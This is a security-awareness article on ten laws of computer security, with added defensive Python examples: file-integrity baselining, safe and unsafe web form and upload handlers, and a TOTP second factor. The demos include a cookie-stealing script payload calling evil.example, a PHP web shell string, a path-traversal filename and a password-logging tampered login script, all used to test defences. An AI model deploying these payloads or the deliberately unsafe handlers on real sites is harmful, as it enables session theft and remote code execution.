Rule 1: If a bad guy can persuade you to run his program on your computer, it's not your computer anymore
Most hacks begin this way: you receive an email or an SMS, you follow a link, and you are given a convincing reason why you have to install something.
Or you receive an email with a document attached, open it, and the document installs the malware for you, usually after persuading you to "enable content" or macros first.
Think twice, click once.
If something is unexpected don't trust it: delete it.
Rule 2: If a bad guy can alter the operating system on your computer, it's not your computer anymore
In the end, an operating system is just a series of ones and zeroes that, when interpreted by the processor, cause the computer to do certain things.
If a bad guy can change them, the now-untrustworthy files will do his bidding, and there is no limit to what he can do: steal passwords, make himself an administrator on the computer, or add entirely new functions to the operating system. To prevent this type of attack, make sure that the system files (and the registry, for that matter) are well protected: keep the operating system patched, do your day-to-day work as a standard user rather than an administrator so that a program you are tricked into running cannot rewrite them, and treat any unexplained change to those files as a sign that the machine has been compromised.
If at all possible, buy devices that come with what you need to reinstall the operating system: the original license keys and installation media.
A fresh install from known-good media is the only way you can be certain of what you're getting.
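One way to notice that system files have been altered, as an added example that is not code from the original article: take a cryptographic baseline of the files while the machine is known-good, keep that baseline where an attacker on the machine cannot rewrite it (offline media or another host), and compare later. The directory tree and the tampering in demo() are constructed for this example; on a real system you would baseline the operating system's own program directories.

```python
"""Baseline-and-verify integrity check for a set of files (added example).

Record a SHA-256 digest and permission bits for every file while the system is
known-good; later, any modified, added or missing file is a signal to
investigate. The tree built in demo() is constructed for illustration.
"""
import hashlib
import json
import os
import tempfile


def sha256_of(path, chunk=1 << 16):
    """Stream a file through SHA-256 so large binaries never load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root):
    """Map every regular file under root (relative path) to its digest and mode."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # keep the demo simple: symlinks are not baselined
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            st = os.stat(full)
            baseline[rel] = {"sha256": sha256_of(full), "mode": st.st_mode & 0o7777}
    return baseline


def verify(root, baseline):
    """Compare the tree at root against a stored baseline.

    Returns sorted lists of modified, added and missing relative paths. A
    permission change (for example a newly setuid binary) counts as modified
    even when the content is unchanged.
    """
    current = build_baseline(root)
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    added = sorted(p for p in current if p not in baseline)
    missing = sorted(p for p in baseline if p not in current)
    return {"modified": modified, "added": added, "missing": missing}


def demo():
    """Constructed scenario: baseline a small tree, then tamper with it."""
    root = tempfile.mkdtemp(prefix="fim-demo-")
    os.makedirs(os.path.join(root, "bin"))
    with open(os.path.join(root, "bin", "login"), "wb") as f:
        f.write(b"#!/bin/sh\nexec /usr/bin/real-login \"$@\"\n")
    with open(os.path.join(root, "hosts"), "wb") as f:
        f.write(b"127.0.0.1 localhost\n")
    saved = json.dumps(build_baseline(root))  # this is what you keep off-box

    # Attacker replaces the login program with one that records passwords,
    # drops a new binary, and deletes a configuration file.
    with open(os.path.join(root, "bin", "login"), "wb") as f:
        f.write(b"#!/bin/sh\necho \"$@\" >> /tmp/.keys; exec /usr/bin/real-login \"$@\"\n")
    with open(os.path.join(root, "bin", "backdoor"), "wb") as f:
        f.write(b"\x7fELF...")
    os.remove(os.path.join(root, "hosts"))

    return verify(root, json.loads(saved))


if __name__ == "__main__":
    print(demo())
```

The baseline is only worth anything if it is stored somewhere the attacker cannot reach with the same access that let him change the files; a baseline kept on the same disk as an administrator-writable file is just one more file to edit.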
Rule 3: If a bad guy has unrestricted physical access to your computer, it's not your computer anymore
Most people are completely unaware of how easily malicious software can be loaded onto their machine simply by letting someone plug in a USB stick.
Even if your computer is powered off, an attacker might be able to boot it from a USB stick and install malware or add hidden components.
Unless you want to superglue shut all of the physical connections on your device (not recommended), just do not give anyone "alone time" with your precious machine.
And, if at all possible, encrypt your hard drive so that the data on it is protected while the machine is powered off. Full-disk encryption does nothing once the machine is unlocked and running, so lock the screen whenever you step away, and set a firmware password so that booting from a USB stick takes more than a key press.
Rule 4: If you allow a bad guy to upload programs to your website, it's not your website anymore
With over a billion active websites in the world, hackers don't just target individuals' machines; they target the sites themselves, and they get code onto them in ways the developers never expected.
We have seen major brands breached because they didn't stop hackers injecting code through web forms. We have seen malware passed on to visitors via embedded adverts.
Website developers typically don't think like hackers. They
design their sites to be helpful and friendly.
You need professional cynics who will advise on how hackers can
abuse such features.
Nothing destroys a brand faster than a website that visitors
think cannot be trusted.
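The two ways in, as an added example that is not code from the original article or from any site it mentions: a web form whose text is echoed back into the page without encoding (the "injecting code into web forms" case), and an upload handler that trusts the client's filename and stores the file where the server will execute it. Each is shown beside a hardened version, in plain Python with no web framework; the attacker inputs in demo() are constructed for this example.

```python
"""Two ways a bad guy gets code onto a website, each beside its fix (added example).

(1) A comment form whose text is echoed into a page.
(2) A file-upload handler.
Attacker inputs in demo() are constructed for this example.
"""
import html
import os
import secrets
import tempfile

# --- 1. Injecting code through a web form (stored cross-site scripting) ---

def render_comment_unsafe(comment):
    """Naive: trusts the form field and splices it straight into the HTML."""
    return '<li class="comment">' + comment + '</li>'


def render_comment_safe(comment):
    """Hardened: HTML-encode so '<script>' is displayed as text, never run."""
    return '<li class="comment">' + html.escape(comment, quote=True) + '</li>'


# --- 2. Letting a bad guy upload programs to the site ---

ALLOWED = {"png", "jpg", "jpeg", "pdf"}  # allowlist of extensions, never a denylist
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff",
         "jpeg": b"\xff\xd8\xff", "pdf": b"%PDF-"}
MAX_BYTES = 5 * 1024 * 1024


def save_upload_unsafe(upload_dir, filename, data):
    """Naive: keeps the client's filename and writes under the web root.

    '../cgi-bin/shell.php' escapes the uploads folder and lands somewhere the
    server will execute it; 'avatar.php' left in the uploads folder is as bad.
    """
    path = os.path.join(upload_dir, filename)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)
    return path


def save_upload_safe(store_dir, filename, data):
    """Hardened: check size, extension and content, choose our own filename,
    and store outside the web root. Raises ValueError on anything suspect."""
    if len(data) > MAX_BYTES:
        raise ValueError("file too large")
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED:
        raise ValueError("extension not allowed")
    if not data.startswith(MAGIC[ext]):
        raise ValueError("content does not match extension")
    stored = secrets.token_hex(16) + "." + ext  # our name: no traversal, no overwrite
    path = os.path.join(store_dir, stored)
    with open(path, "wb") as f:
        f.write(data)
    return path


def demo():
    """Run constructed attacker inputs through both versions of each handler."""
    payload = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
    results = {
        "unsafe_html_has_script_tag": "<script>" in render_comment_unsafe(payload),
        "safe_html_has_script_tag": "<script>" in render_comment_safe(payload),
    }
    root = tempfile.mkdtemp(prefix="upload-demo-")
    upload_dir = os.path.join(root, "www", "uploads")
    store_dir = os.path.join(root, "private-store")
    os.makedirs(upload_dir)
    os.makedirs(store_dir)
    webshell = b"<?php system($_GET['cmd']); ?>"

    written = save_upload_unsafe(upload_dir, "../cgi-bin/shell.php", webshell)
    inside = os.path.realpath(written).startswith(os.path.realpath(upload_dir) + os.sep)
    results["unsafe_escaped_upload_dir"] = not inside

    rejected = []
    for name in ("shell.php", "shell.php.png", "../cgi-bin/x.png"):
        try:
            save_upload_safe(store_dir, name, webshell)
            rejected.append(False)
        except ValueError:
            rejected.append(True)
    results["safe_rejected_every_webshell"] = all(rejected)

    kept = save_upload_safe(store_dir, "photo.PNG", MAGIC["png"] + b"\x00" * 32)
    results["safe_kept_real_png_in_store"] = os.path.dirname(kept) == store_dir
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The hardened upload handler never lets the client choose where a file goes or what it is called, and it checks that the bytes look like the type the name claims; the hardened form handler encodes on output rather than trying to strip "bad" characters on input, which is the check that actually holds up.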
Rule 5: Weak passwords trump strong security
Always use a password on your computer; it's amazing how many accounts have blank passwords. Once you've picked a strong password, handle it appropriately: don't write it down, and if you absolutely must write it down, at the very least keep it in a safe.
Build a password that is as long as possible and mixes upper- and lower-case letters, numbers and punctuation marks; avoid a single "dictionary word", and consider using two or more unrelated words in combination, since extra length does more for you than swapping letters for symbols. Never reuse one password across several systems: when one site is breached, the stolen password is tried everywhere else. A password manager is the practical way to have a long, unique password for every account.
You need to practice good password hygiene: use complex passwords, don't share passwords between people or between systems, and don't write them on whiteboards or post-it notes.
Rule 6: A computer is only as secure as the administrator is trustworthy
The "insider threat" is a growing problem.
Remember that if you give someone privileges on your systems,
you are giving them the keys to the crown jewels.
And don't assume that because someone works in technology they are immune to human frailties.
They can be scammed out of logon credentials just like the rest of us, and unless your systems are configured to prevent it, those credentials could let a hacker walk away with data.
Make sure valuable data needs more than a simple username and password for access: require a second factor, and give administrators separate, more tightly controlled accounts for their privileged work.
Some major data breaches have happened this way, starting from one set of stolen credentials.
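What "more than a username and password" looks like in practice, as an added example that is not code from the original article: a time-based one-time password (TOTP, RFC 6238) as the second factor. The user's authenticator app and the server share a secret once; each login then needs the password plus a six-digit code derived from that secret and the clock, so a phished password on its own does not get the attacker in. The secret below is the published RFC 6238 test secret, used so the output can be checked against the RFC; the password check is a stand-in for whatever your system already does.

```python
"""TOTP (RFC 6238) second factor, built on HOTP (RFC 4226). Added example.

RFC_SECRET is the RFC 6238 Appendix B test secret; the stored password and
the login() flow are constructed stand-ins for a real account system.
"""
import hashlib
import hmac
import struct

STEP_SECONDS = 30


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based one-time password (RFC 4226) for one counter value."""
    msg = struct.pack(">Q", counter)
    mac = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # "dynamic truncation": low nibble picks the window
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, at: int, digits: int = 6) -> str:
    """TOTP: HOTP over the number of 30-second steps since the Unix epoch."""
    return hotp(secret, at // STEP_SECONDS, digits)


def verify_totp(secret: bytes, submitted: str, at: int, window: int = 1) -> bool:
    """Accept the code for the current step and `window` steps either side,
    to tolerate clock drift, comparing in constant time."""
    for drift in range(-window, window + 1):
        candidate = totp(secret, at + drift * STEP_SECONDS)
        if hmac.compare_digest(candidate, submitted):
            return True
    return False


def login(stored_password: str, secret: bytes, password: str, code: str, at: int) -> bool:
    """Both factors must pass. A real system stores a salted password hash
    rather than the password; the comparison here stands in for that check."""
    if not hmac.compare_digest(stored_password, password):
        return False
    return verify_totp(secret, code, at)


RFC_SECRET = b"12345678901234567890"  # RFC 6238 Appendix B test secret

if __name__ == "__main__":
    print(totp(RFC_SECRET, 59))                                        # 287082
    print(login("hunter2", RFC_SECRET, "hunter2", "000000", 59))       # False
    print(login("hunter2", RFC_SECRET, "hunter2", totp(RFC_SECRET, 59), 59))  # True
```

Note that a code is valid for only a short window and should also be rejected once it has been used, so that an attacker who captures one on a phishing page cannot replay it later; the shared secret itself now becomes something to protect as carefully as the password database.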
Rule 7: Encrypted data is only as secure as the decryption key
Encryption can be a great tool to prevent criminals getting at data if a machine is stolen.
But as computers increase in power, older ciphers and short keys become breakable, and whatever the cipher, the key is only as strong as the password it is derived from.
Look for encryption that is known to be strong, for example the Advanced Encryption Standard (AES), with keys that are considered "long" (128 bits or more). Then remember that nobody will brute-force the AES key when they can guess the short password that unlocks it, so the password protecting your disk deserves the same care as any other.
Also, most encrypted devices have some means of recovering data if, as we all do, we forget our passwords or something similar.
If you've ever encrypted a disk you'll probably find you were asked to save a recovery key to a USB stick, or even to print out a long sequence of letters and numbers.
If you store this recovery information with the protected device it's hardly worth the effort of encrypting it in the first place: the recovery key unlocks the disk just as well as your password does.
Lock your recovery keys away somewhere safe and don't carry them with you.
Rule 8: An out-of-date virus checker is only marginally better than none at all
Hundreds of thousands of new variants appear each year in
addition to completely new strains.
The set of malware that your virus checker knew about when you
first installed it is out of date very quickly.
Hackers do still try to use older versions of malware but they
know many of us fail to keep our systems up to date, so they tweak the malware
in the hope that the virus checker will miss it.
Update your virus checker as regularly as you possibly can, and
do the same for your operating system.
If you tend to turn on your machine infrequently, do your updates before you start checking those emails or visiting your bank's website.
Rule 9: Absolute anonymity isn't practical, in real life or on the web
Not everyone who wishes to browse the web anonymously is doing
so for illegal reasons.
But be aware that many technologies out there that can provide
anonymity need to be used correctly otherwise you can be tracked.
And remember that being tracked is becoming the norm online.
If you're not a paying customer you are probably the product, as
marketers track you to more accurately target you.
Try using a browser that has a "private mode" or that sends "do not track". Be clear about what they do: private mode only stops the browser keeping history and cookies on your own machine, while the websites you visit and your network provider see you just as before, and "do not track" is a polite request that most sites ignore. Neither makes you anonymous, but they may lessen the degree to which you are monitored.
Rule 10: Technology is not a panacea
Don't assume that just because your machine is using the latest
versions of everything, and you have the full array of security software
installed, that you are fireproof.
The weakest link in any security chain is us: humans. We fall
for scams, we do silly things and we suffer from security fatigue very quickly.
Worst of all we assume it won't happen to us - until it does.
Phones, tablets and wearables are all essentially small computers, and the laws written back in 2000 apply to these devices as much as they ever did to the computers of 15 years ago. In fact, there is a real danger that we are forgetting the lessons of the last 15 years, and hackers are hoping to catch us off guard.
These rules have proven to be fundamental in nature, so keep
them in mind no matter what form your "smart" technology takes.
And if in doubt ask someone who knows.